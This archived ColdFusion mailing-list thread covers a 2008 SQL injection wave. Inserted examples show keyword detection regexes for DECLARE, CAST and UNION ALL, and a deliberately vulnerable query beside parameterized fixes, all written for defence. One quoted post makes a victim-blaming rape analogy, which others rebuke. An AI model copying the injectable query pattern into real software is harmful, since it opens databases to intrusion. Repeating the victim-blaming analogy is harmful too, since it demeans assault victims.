SQL injection attack on House of Fusion
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311650
> That is, unless you concatenate SQL in your stored procedure.
>
> http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me
Perfect example, thanks!
Yeah, dunno what I was thinking... parsing that stuff would be not un-hard. =]
Ah, yes, not impossible... but screw that idea.
I'll stick to cleaning up simple queries and whatnot. :op
--
The scars of others should teach us caution.
St.
Jerome
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311643
That is, unless you concatenate SQL in your stored procedure.
http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me
~Brad
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311642
Ah, thank you Dave! I was thinking of cfstoredproc, I reckon.
/tips hat
:Denny
--
Marriage is good for those who are afraid to sleep alone at night.
St. Jerome
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311630
> It doesn't work with stored procedures (which shouldn't
> matter, 'cause I think they are type-checked by the DB first
> anyways)
Well, not necessarily. As Mark pointed out when this thread started - it
feels like it was long, long ago - if you're calling a stored procedure from
CFQUERY you have to check your variables there too. If you're using
CFSTOREDPROC, that builds a prepared statement that calls the stored
procedure for you, and you don't have to worry about it.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311626
> Just got nailed myself - dammit - 15 years of knowledge.
There are at least 2 tools available that will search through your
code looking for unparamed variables, and I think Larry posted a
simple regex that you could use from within Eclipse. Those will help.
I actually got a little nutty and wrote my own tool, that does a bit
of database introspection, rewrites the query using the correct
cfsqldatatypes, and then tests the query. Kinda cool, wasn't too
hard, conceptually-- you have the DSN right there.
It doesn't work with stored procedures (which shouldn't matter, 'cause
I think they are type-checked by the DB first anyways), although, I
was thinking (about something Jochem said about the difficulty of
introspecting stored procedures and whatnot, sorta) that since I think
the DB will give you the source for the procedure or function, you
could use /that/ to introspect them, and create ORM type deals.
Right?
You would have to code stuff for each DB (or at least the most popular
at first), which is a little sucky, but I think unavoidable. There
are certainly similarities between DBs tho, which would make it a tad
easier.
Probably just pie-in-the-sky type thinking, ignoring some fundamental
problem, but it sounds kind of plausible.
Anyways, half-way through coding my thing, I was like, damn, this
would have been a perfect use for ANTLR! There are even grammar files
for SQL, which would make parsing that easier. Oh well. Maybe the
next version. LOL. After I finish this one.
I'm still messing with the UI for it- uses dojo (of course) with a
nice split screen, the top half has a tree control for browsing the
files and folders with unparamed queries, and the bottom half actually
shows you the source that would change, assuming the query passes the
test. Still need to add de-select, so you can ignore directories,
files, or individual queries, and then I'll probably post a link to
it.
I started getting a little excited while coding it, thinking about
the... what was it called? Ah, yes- coding standards/review. I
remember Will had posted a tool, and I had been toying with creating a
tool for managing the attributes (hint, access, etc..) of
functions/CFCs myself... wouldn't it be nice to have a tool that would
do everything (format code, check for unvared variables, maybe even
allow for drag-and-drop moving of functions/refactoring? (Ok, that's
kinda extreme, but it was an exciting thought.)). Maybe tie it into
the SVN stuff, even? Heh.
I began thinking about getting all wiggy with it, because I wrote the
code in a pretty sloppy manner (switching between camelCase and all
lowercase, cutting/pasting functions and not changing the hint
attribute, etc.), and was like, "hell, I could tweak this tool to
tweak itself". And then every time I switched between styles, I was,
like, hey, I'm creating a test-case! LOL. Something like that.
It would be pretty easy, as it currently is, to have the tool replace
queries like "SELECT * FROM sometable" with the actual column names,
for instance, or even do things like refactor queries, changing column
or table names... I grab the DSN metadata, and parse the SQL into
table names and column names, so it's all there.
I need a bunch more "bad" query test cases, for various DB dialects,
but I'm thinking I'll link up with the group I saw at some point
(maybe it was just a blog post, now that I think about it), that's
specifically targeting the prevention of injection attacks, and see if
we can't get a nice set of cross-database testcases to use for tools
like this.
So, in the end I hope to have a source-code maintenance type tool, as
I think it sounds kind of cool. Over time, it looks like it would
become a freaking web-based IDE. :-)p
Heh... I started thinking about how I could pull off some cool
DB/query stuff within CFEclipse again, while messing around with this
stuff.
But I digress...
LOL.
:)e|\|
--
Haste is of the Devil.
St. Jerome
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311574
Open the website log with Word and do a search for DECLARE;
you will find a lot of entries..
Look for a filename that is in a different directory than what you
expected.. I think I got hit from a template that was in an old,
unused directory from many years ago. I recently went through the
server and deleted all of my old unused directories..
Also look for any ASP pages that are being hit..
At 06:46 AM 8/26/2008, you wrote:
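An added example of the log search Al describes, written for this thread and not taken from any post in it. It reads constructed IIS-style log lines (not real traffic), flags requests whose query string carries the DECLARE or CAST keywords Dave mentions, and tallies the hits per requested template so a template in an unexpected directory stands out. The log field layout and the sample lines are assumptions.

```cfml
<cfscript>
// Constructed IIS-style log lines (not from any real server):
// date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
logText = "2008-08-26 10:46:01 198.51.100.7 GET /index.cfm page=2 200" & chr(10)
        & "2008-08-26 10:46:03 198.51.100.7 GET /old/archive/list.cfm id=12;DECLARE%20@s... 200" & chr(10)
        & "2008-08-26 10:46:04 198.51.100.7 GET /old/archive/list.cfm id=12;DeClArE%20@s... 200" & chr(10)
        & "2008-08-26 10:47:10 203.0.113.5 GET /news/item.cfm id=7 200" & chr(10)
        & "2008-08-26 10:47:12 203.0.113.5 GET /legacy/form.asp id=7;CAST(... 200";

// Keywords the thread calls out for this attack. Matched case-insensitively,
// because the attacker controls the casing; a later attack may use other words.
keywordPattern = "\b(DECLARE|CAST)\b";

function scanLog(text, pattern) {
    var hits = structNew();   // uri-stem => number of suspicious requests
    var lines = listToArray(text, chr(10));
    var i = 0;
    var fields = "";
    var stem = "";
    var query = "";
    for (i = 1; i lte arrayLen(lines); i = i + 1) {
        fields = listToArray(lines[i], " ");
        if (arrayLen(fields) lt 7) continue;   // skip comment or malformed lines
        stem = fields[5];
        query = urlDecode(fields[6]);          // payloads arrive URL-encoded
        if (reFindNoCase(pattern, query) gt 0) {
            if (not structKeyExists(hits, stem)) hits[stem] = 0;
            hits[stem] = hits[stem] + 1;
        }
    }
    return hits;
}

hits = scanLog(logText, keywordPattern);
for (stem in hits) {
    writeOutput(stem & ": " & hits[stem] & " suspicious request(s)<br>");
}
</cfscript>
```

Any stem listed that you did not expect to be reachable (here the /old/ and /legacy/ paths) is the kind of forgotten template Al found; the ASP hit is the case he flags separately.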
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311562
> Have code reviewed and wasn't my CFML (at this stage) so
> maybe a new IIS vulnerability?
I seriously doubt this has anything to do with IIS, since IIS can't interact
directly with your database.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Peter Tilbrook
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311556
Just got nailed myself - dammit - 15 years of knowledge.
Have code reviewed and wasn't my CFML (at this stage) so maybe a new IIS
vulnerability? My attack occurred recently - possibly in the last 24 hours or so.
Have disabled the database and <CFABORT>ed any code that interacts with the
database until I can solve the disastrous problem (apparently the attack came
from China).
Sigh!
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311515
...
> Your main concern is not the consumption of resources as a result of an
> automated attack. That's just like any other denial of service attack,
> basically. If you can filter it out successfully, that's good for you, but
> you should be far more concerned with the results of a successful SQL
> injection attack.
Hey Dave!
Not to argue the difference between if(len()) and if(len() eq 0)... [-;)
I think DoS attacks are something to be aware of. I shudder to think
of a million error emails, and the load that puts on multiple servers,
bandwidth, etc..
DoS attacks are one of those deals, that can cascade. Like the Great
Black-out, of whatever year that was. 70-something? Or like the bank
crisis of the late 90s... Eh.
Not to lessen the injection attacks, which are more likely to cause
real damage, and are more likely to expose a security hole than DoS
(but DoS can end up exposing quite a bit too, so) yeah, just wanted to
say, the layered thing seems the way to do it.
Low level, quick stuff, and high level, (most likely) slower stuff.
For a web-app developer though (no admin responsibilities), maybe it
goes like this:
1) Sanitizing *all* user input. GiGo.
2) Avoid a self-imposed DoS, by things like error emails with no
throttle, emailed logs/huge logs on disk/in memory, or whatever.
Just wanted to sorta put emphasis on the fact that a DoS is still
something that's pretty bad, and *can* end up being as bad, or worse,
than injection attacks.
Just adding some emphasis, is all. You can DoS yourself with some of
the solutions I've seen to the injection attacks.
Not that we really have to worry, right? I'm sure we're all doing
load-testing, and part of that is testing a massive amount of errors,
right (intentional or no;)? Right?
Hahahahaha.
*sigh* someday. :-)
Man, how did I get here from trying to express the idea that one
attack can cascade into another kind of attack, or something like
that? Eh. *shrug* :-)
May your buffers never overflow,
|Den
--
Catch, then, O catch the transient hour; Improve each moment as it flies!
St. Jerome
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311513
That actually doesn't sound too painful. More cpu intensive compared
to what I've got now (unless my keyword blacklist keeps growing), but
pretty simple.
I get the idea of "deny, allow", but when you can cut out like 95% of
the crap with a super-fast "this is bad" type deal... hmm... my
real-world mind says go for it, while my programmer "perfect world"
mind knows it's not the "most secure" angle.
Stupid trade-offs! Wish we could "pick all three", as the saying goes.
Heh. I'm actually liking the idea of only passing ID numbers in the
url request, which would make for a simple rule. Hmm... What else
would you really need to pass besides a single token, the thread of
the web? Am I thinking screwy, or what?
Doesn't do squat for form or anywhere else, I reckon-- but what's the
percentage of form submissions vs. url requests? Eh. Guess, like all
things, it sorta depends on what you're doing, and trying to do, etc..
Thanks Jochem, I always enjoy your correspondence.
:Denny
--
Catch, then, O catch the transient hour; Improve each moment as it flies!
St. Jerome
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311467
> I've done some additional testing and have found that the prior
> version of the SQL Injection Blocker does better when challenged with
> the HP Scrawlr testing tool than the newest version. Rolling back to
> the prior release also solved the false positive problem for the three
> towns mentioned earlier.
Hmm, interesting. My own customers ran into several problems with that version,
that have been fixed with the new one. I'm not surprised it does better with
scrawlr though as for us it had way more false positives and was blocking *too*
much stuff.
Just goes to show, there's no one solution that works for everyone...and how
important it is not to rely on these tools exclusively since they clearly do not
work 100% of the time.
--- Mary Jo
Author: Matthew Smith
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311464
Mary Jo,
I've done some additional testing and have found that the prior version of the
SQL Injection Blocker does better when challenged with the HP Scrawlr testing
tool than the newest version. Rolling back to the prior release also solved the
false positive problem for the three towns mentioned earlier.
Matt
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311456
> My site has community profiles for cities and towns. The URL for these
> profiles includes the county name as well as the city or town name.
> There are Union counties in North Carolina, New Jersey and Ohio.
Or...maybe you could just get the states to rename that county. ;-)
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311455
> Can anyone suggest a modification to the code
> that would eliminate the false positives without substantially
> weakening the filter?
The one in there now is by Luis Melo and his email is in the credits. You might
want to send them along to him as I know he plans to work more on reducing the
false positives as he has time. It's definitely a challenge to make sure you
catch everything bad and let everything good through, so some false positives are
probably inevitable.
--- Mary Jo
Author: Matthew Smith
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311450
I've upgraded to the latest version of Mary Jo's tool to filter attempts at SQL
injection. It works well, but I found three interesting false positives today.
My site has community profiles for cities and towns. The URL for these profiles
includes the county name as well as the city or town name. There are Union
counties in North Carolina, New Jersey and Ohio. There are three towns that get a
false positive flag. They all start with "All" (Allenwood, Allen Center and
Allens Crossroads). The URLs have the format of /Union/Allenwood.cfm,
/Union/Allen-Center.cfm and /Union/Allens-Crossroads.cfm. Clearly, the
combination of "Union/All" is causing the problem. Can anyone suggest a
modification to the code that would eliminate the false positives without
substantially weakening the filter? The RegEx in her tool
(http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18)
is way beyond my skill set.
TIA,
Matt
...
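An added illustration, not the blocker's own code (its real regex is not on the page), of why the three Union county URLs above trip a loose keyword pattern, and how anchoring the keywords on whitespace and a word boundary removes that particular false positive. Both patterns are assumptions chosen to show the mechanism.

```cfml
<cfscript>
// Loose pattern: UNION, any run of non-word characters, ALL. "/Union/All" matches
// because "/" is a non-word character and nothing stops the match at "Allenwood".
loosePattern = "union\W+all";
// Tighter pattern: only whitespace may separate the keywords, and ALL must end
// at a word boundary, so "Allenwood" no longer qualifies.
tightPattern = "\bunion\s+all\b";

function isFlagged(input, pattern) {
    return reFindNoCase(pattern, input) gt 0;
}

// Constructed inputs: the three URLs from the post plus one that should be flagged.
samples = [
    "/Union/Allenwood.cfm",
    "/Union/Allen-Center.cfm",
    "/Union/Allens-Crossroads.cfm",
    "x union all y"
];

for (i = 1; i lte arrayLen(samples); i = i + 1) {
    writeOutput(samples[i] & " loose=" & isFlagged(samples[i], loosePattern)
                & " tight=" & isFlagged(samples[i], tightPattern) & "<br>");
}
// Tightening a pattern trades false positives for misses; as Mary Jo notes below,
// the filter is a stopgap until every query is parameterized with cfqueryparam.
</cfscript>
```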
Author: Sandra Clark
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311383
Funny,
I went to high school with him. Had a comp sci class with him where he
spent quite a bit of time trying to get passwords from unsuspecting people.
> A while ago I read a totally riveting book called "The Art Of
> Intrusion" by Kevin D Mitnick, the legendary hacker who was sent to
> jail for his intrusion exploits. He runs a security company now,
> that tests your security and reports back on how well you've done.
Author: Jenny Gavin-Wear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311364
This is totally off topic in this list, but I'll make this comment and
that's an end to it.
Your expression "asked for rape" defies the logic of your argument. Asked
for rape would mean she asked for sex and would therefore be a consenting
adult, ie, not a rape victim.
Overall a really bad and totally insensitive analogy, the likes of which I
hope we never see on this list again.
Enough ............
Rick,
While your argument is well put, perhaps we could choose a slightly less
inflammatory analogy than rape. We have a large group here and I wouldn't
want anyone to be incensed by trivializing such a traumatic event (although
obviously that is not the intent).
-Mark
This would probably be more productively viewed as a "responsibility"
issue, rather than blame.
Both parties, webmaster and attacker, bear responsibility for the status of
the server/data/etc.
A negligent server/website admin bears a certain amount of responsibility
for the situation. The attacker also bears responsibility for the
consequences of the attack.
A court of law might hold only the attacker ultimately responsible.
However, the supervisor of a negligent server/website administrator would
view it as shared responsibility between the attacker and the attacked, as
in, "Why wasn't the server/website protected in the first place?"
Viewing this as a rape case, if a girl was hanging out on a street corner
and asking passers-by to rape her, then, yes, she bears some responsibility
for putting herself in that situation. It doesn't mean the one who rapes
her doesn't bear the greater responsibility for the situation, and,
therefore, punishment, but a fair judge would have to ask the girl why was
she asking passers-by to rape her in the first place.
Girls should reasonably avoid provoking rapists, and rapists should resist
their impulses.
Likewise, server/website admins should reasonably protect their servers and
websites, but hackers should avoid their impulses or share responsibility
for the situation.
Rick
Author: Jenny Gavin-Wear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311363
I'm using WhosOn, an IIS server monitor. It does an auto look up on the
location of the IP and I can also set it up to record alerts for keywords,
such as DECLARE.
www.whoson.com
Bobby, what have you been using to look up the origin of the IPs en masse?
I found a site that lets me do a handful at a time, but I don't know how
accurate the data is. It is saying the majority of my IPs originated from
the US.
~Brad
> Now look at how many of those are from Asia Pacific Network Info Centre
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311362
OK. I thought it was from you. I was sent an email with the link to SQLprev.cfm
in an email and they referenced I use your suggestion in the email as well. I
stuck the two together.
> David Moore, Jr. wrote:
> > I am currently using the SQLprev.cfm from Jochem
Jochem Wrote?
> The what from whom?
Please don't shoot me. I am new to all this? Sleep deprived...
~David
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311361
David Moore, Jr. wrote:
> I am currently using the SQLprev.cfm from Jochem
The what from whom?
Jochem
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311359
> Actually I am a pacifist at heart and always try to not lose my temper
> (serves me well with customers, particularly the endlessly annoying ones!)
LOLOL. I am actually a moderately conservative liberal. I believe in losing my
temper only when I know I can't find it.
> As for not knowing what cfqueryparam is and how to properly secure an
> application (there's more to it than just cfqueryparam) hopefully all these
> issues that people are dealing with will help such information make its way into
> even beginner CF materials, and not have it be so much of an afterthought as it
> seems to have been up to this point.
On a serious note, it would have been nice that I would have been more aware when
I started coding those many years ago. I have more lines of code that need
reworking than I care to think of, but I have to start somewhere.
> --- Mary Jo
Thanks for your help today! You have been incredibly patient and kind. Now, I
must go home because my wife has called for her third and last time, which means
I am on the couch...
~David "Rock" Moore
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311358
Mary Jo,
Sorry. Didn't see all that. First time using this kind of post.
> Here's another "smack down" for you....it would be nice if you could remove all the
> extra quoted stuff on your posts....take a look at the online web archives, it
> really makes a mess of the thread!
Will do better in the future. No way for me to go in and edit that once it is
posted? YUCK. Where's a good Langolier when you need one? Thanks for the
education though.
~David
P.S. I like your Smack Downs. You got GRIT! Were you wearing a cape or mask when
you wrote that SMACK!?
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311357
> Eric is pretty good at the Smack Down too, Eric The Great takes David
> the Geek over the ropes and into the first row of chairs! (Yes, I am
> from the South and everything references Wrestling or Nascar)
Here's another "smack down" for you....it would be nice if you could remove all
the extra quoted stuff on your posts....take a look at the online web archives,
it really makes a mess of the thread!
--- Mary Jo
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311356
> P.S. Speaking of Smack Down's. Mary Jo's got a great right cross :) Go
> get'em girl!
LOL, actually I am a pacifist at heart and always try to not lose my temper
(serves me well with customers, particularly the endlessly annoying ones!)
As for not knowing what cfqueryparam is and how to properly secure an application
(there's more to it than just cfqueryparam) hopefully all these issues that
people are dealing with will help such information make its way into even
beginner CF materials, and not have it be so much of an afterthought as it seems
to have been up to this point.
--- Mary Jo
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311341
Don't feel bad, David. I am a freelance CF programmer. I spend most
of my time working on bug fixes or feature enhancements on code
written by others. And the vast majority of files I work on have no
<cfqueryparam.
Most of the code I work on really needs re-writing from scratch it's
so poorly written. At least in my experience, very few CF
programmers use <cfqueryparam. It's quite frightening really. Not
only is the code vulnerable to attack, it's slow, inefficient, and
often just plain wrong.
I'd say one of the best things you have ever done as a CF programmer
is join this list and pay attention to the things clever folks like
Dave Watts have to say. Rare is the day when I don't learn something
useful on this list.
--
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311338
> When you say "Update Your Code", are you saying using
> <cfqueryparam>?
Yes. That is the only mechanism guaranteed to prevent known and future SQL
injection attacks. Using a filter can protect you from the current attack
long enough for you to fix your broken code.
> But even so, the SQL injection still will use
> up countless resources instead of cutting it off early. So,
> go back and fix 1,000's of lines of code I have developed
> over the last 'upteen' years or stop it before it starts? Is
> this something new to CF8 or just a necessary evil because of
> SQL Injection Attacks.
It's only possible to stop something before it starts if you can clearly
identify what "it" is. In this attack, for example, there are some specific
keywords that you can use in a filter: DECLARE and CAST. The next attack may
use different keywords, or different permutations of the same keywords
(using Unicode sequences instead of ASCII characters, for example).
Your main concern is not the consumption of resources as a result of an
automated attack. That's just like any other denial of service attack,
basically. If you can filter it out successfully, that's good for you, but
you should be far more concerned with the results of a successful SQL
injection attack.
> is <cfqueryparam> something a lot of programmers really use?
A lot of (arguably, almost all) competent programmers use it. Fewer
incompetent programmers use it. I'm not trying to pick a fight with you
either; I'm not calling you incompetent. But at this point, web application
programmers using almost any language should be familiar with the concept of
prepared statements (what you're building with CFQUERYPARAM) and why they're
important.
> I am afraid all I know is what I have learned from books and
> forums. This is the first I have ever heard of using <cfqueryparam>.
It's been mentioned periodically on this list for years. It's covered in the
official Adobe courseware, and in all of the CF books I've seen. That said,
I can see how you might not know about it if you don't pay relatively close
attention to all this stuff.
But with THAT said, it is your job and responsibility as a web developer to
be aware of best practices and requirements within that field. There are
PLENTY of resources about building secure web applications. Those resources
might not cover CF specifically all that much, but if you read in Open Web
Application Security Project (http://www.owasp.org/index.php/Top_10_2007),
for example, about the top ten vulnerabilities in web applications, you
would see that SQL injection is on the list and that you use prepared
statements to prevent it. Your next question should be, "how do I build a
prepared statement in ColdFusion?" You, as the web developer, are often
responsible for ALL SORTS of things that you're not going to learn in books
or forums: development issues like application security, interface issues
like usability and accessibility, business issues, deployment issues, etc,
etc. What's more, your responsibility may well be legally binding; in other
words, you might get sued for doing the wrong thing for a client.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
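An added example, not code from any post in the thread, of the points Dave makes here and earlier about stored procedures, with Brad's caveat: the raw string-splice query beside the prepared-statement forms, first cfqueryparam inside cfquery, then a stored procedure called from cfquery, then cfstoredproc with cfprocparam. The datasource, table and procedure names are assumptions.

```cfml
<!--- Vulnerable: the URL value is spliced into the SQL text, so whatever the
      client sends after the number (a ";DECLARE ..." suffix, say) is parsed as SQL. --->
<cfquery name="getThread" datasource="cftalk">
    SELECT threadid, subject
    FROM threads
    WHERE threadid = #url.threadid#
</cfquery>

<!--- Fixed: cfqueryparam makes this a prepared statement. The value travels as a
      typed bind parameter, never as SQL text, and cf_sql_integer rejects
      non-numeric input before the query reaches the database. --->
<cfquery name="getThread" datasource="cftalk">
    SELECT threadid, subject
    FROM threads
    WHERE threadid = <cfqueryparam value="#url.threadid#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- Calling a stored procedure from cfquery still needs the argument bound;
      without cfqueryparam it is the same string splice as the first query. --->
<cfquery name="getThread" datasource="cftalk">
    EXEC dbo.getThread @threadid = <cfqueryparam value="#url.threadid#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- cfstoredproc builds the prepared call for you: each cfprocparam is a bind
      parameter, so there is no SQL string on the CF side to inject into. --->
<cfstoredproc procedure="dbo.getThread" datasource="cftalk">
    <cfprocparam cfsqltype="cf_sql_integer" value="#url.threadid#">
    <cfprocresult name="getThread">
</cfstoredproc>

<!--- Caveat from Brad's reply: none of this helps if dbo.getThread itself
      concatenates its argument into dynamic SQL and executes the string;
      the procedure must bind the value too. --->
```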
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311339
A while ago I read a totally riveting book called "The Art Of
Intrusion" by Kevin D Mitnick, the legendary hacker who was sent to
jail for his intrusion exploits. He runs a security company now,
that tests your security and reports back on how well you've done.
He says one of the most common failures of security systems of all
kinds is that they rely on a secure perimeter. The theory is that
if we keep the hordes out of the city at the boundaries, that's all
we need to do. Unfortunately all the bad guys need is a single crack
in that outer perimeter and they can go wherever they like. So his
hacking attempts usually meant hunting for some hole in the wall, and
once through that hole the entire enterprise was laid out for the
taking.
He'd find a router left online but unsecure by some lazy support
person who wanted to be able to work from home. Or a long-forgotten
modem somewhere, and once through that security hole, there were no
other security blockers and the whole network was his for the raping
and pillaging.
The lesson we learn from this? Don't rely on only one defense
mechanism. All it takes is one crack in that armour and you're dead.
You need to use all the weapons you have at your disposal. In this
case, we need to use the Regex blockers, <cfqueryparam, strong
passwords, regular password changing, separate physical machines
for web and database - everything you can think of to make it more
difficult for the attackers.
That book was a great read on its own, but a real education for me as
a web developer. I heartily recommend it. The opening chapter is
highly amusing - where he is hired to probe security at a company, and
at the review meeting where he presented his report, he said 'yes I
managed to get in and managed to get some unauthorised access. And
I think you should have done a better job on your application for a
raise. And did you know you are being paid less than others of
equivalent rank in your company? Oh and the profits you're going to
report next month are x xx xx .. you have a secretary who is having
an affair with one of your senior execs." When their mouths gaped
open he finished it with the clincher .. "oh and this PC I'm using for
the presentation - it's yours. Your security manager gave it to me,
along with remote admin access to your network, and I have been working
remotely through your network for the past month."
A fantastic read.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311337
Consider me connected. At the same time, I will try not to just suck the life out
of the list and provide substance where I can. I was a morning radio announcer
for 20 years before becoming a web programmer, so if you can't remember the name
of that song or artist - just ask. :)
As for the can o' worms. If you're ever in Spartanburg, SC, just bring 'em along
and I can show you some really nice fishin!
Seriously, thanks everyone!
~David G. Moore, Jr.
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311336
> So, I have found like the "Mother Load" of good programmers who really care
> about Cold Fusion and take the time to do it right?
Pretty much. The skill level on the list varies from "can express the
meaning of life in ColdFusion" to "what's a database" so your experience
may vary. I'd like to think that everyone here, including me, is
looking to learn through the experience of others, so you're in the
right place. Welcome!
-Justin Scott
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311335
> I certainly don't feel picked on. I feel blessed to have a place where I can
> learn from people who do know so much. And you are right. I (we) only seem to
> learn under fire. I am a one man business owner in a small town with limited
> resources and time. 10 hour days, work weekends, what is family time except
> coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So,
> what do we do?
Well, the first step is getting more connected to the community, being
exposed to different styles, and being on a list such as this one is a
great start. Presentations at user groups can also cover topics such as
this if you have one near your area.
> So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post????
In short, PCI-DSS is the Payment Card Industry Data Security Standard.
It is required for any merchant who accepts, processes, handles, stores,
or transmits credit card or debit card information. It isn't law, but
your merchant account (or those of your clients) will have provisions in
their contracts that require compliance with these rules. You can read
more about it at:
https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml
That's another whole can o' worms though.
-Justin Scott
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311334
So, I have found like the "Mother Lode" of good programmers who really care about
Cold Fusion and take the time to do it right? Because every piece of code I have
ever gotten from Adobe Exchange or purchased from other sites has never had
<cfqueryparam>. And I know Ben is going to shoot me, because looking back
at some of his Advanced books now I see where he says I should be using it.
I guess my 10 hour days just turned into 14 hours. Anybody got a Starbucks
Supersize Java Java Double Caffeine coupon?
Eric is pretty good at the Smack Down too, Eric The Great takes David the Geek
over the ropes and into the first row of chairs! (Yes, I am from the South and
everything references Wrestling or Nascar)
~David
----- Excess quoted text cut - see Original Post for more -----
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311333
Well, it is my goal :) not there yet...
----- Excess quoted text cut - see Original Post for more -----
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311332
The only way I found the SQL Injection Attack was my server kept crawling to a
dead halt. I looked in SeeFusion (some software I purchased that lets me see
what is going on live with the websites) and I noticed that the sites' Total Time
just kept going up and never resolving, basically every website coming to a halt
and bringing my server to a screeching halt. I would reboot CF to get it to
unlock. After a scan of Cold Fusion logfiles application.cfm file, I saw this
weird URL string and thus my search landed me here.
Whether or not that is what was or is bringing my server to a halt, I don't know
- but I can only hope. I am pretty sure it has something to do with the (don't
everyone scream all at once) 45 access databases I am using to run the individual
websites off of or not, but just maybe.
~ David G. Moore, Jr.
P.S. Can't wait to see everyone's response to this one. I am pretty sure I am
about to get another SMACK DOWN...
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311330
Right on Dave... That's a point I've been making as well.
It is the SQL injection attacks that don't "obviously" do anything that are
more insidious. For those of you who have found your sites vulnerable, this
attack is not the one that should be keeping you up at night. Instead, it
should be those attacks that came in and left with your data without
arousing any alarm at all :)
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311331
Eric,
A good answer might be .... "it is now" :)
> > is <cfqueryparam> something a lot of programmers really use?
> Only the good ones. ;)
> Thanks,
> Eric
----- Excess quoted text cut - see Original Post for more -----
Author: Eric Cobb
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311329
> is <cfqueryparam> something a lot of programmers really use?
Only the good ones. ;)
Thanks,
Eric
David Moore, Jr. wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311328
Justin,
I certainly don't feel picked on. I feel blessed to have a place where I can
learn from people who do know so much. And you are right. I (we) only seem to
learn under fire. I am a one man business owner in a small town with limited
resources and time. 10 hour days, work weekends, what is family time except
coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So,
what do we do?
I am a little embarrassed to say I didn't know, but at least in honesty I can
learn and get a complete picture.
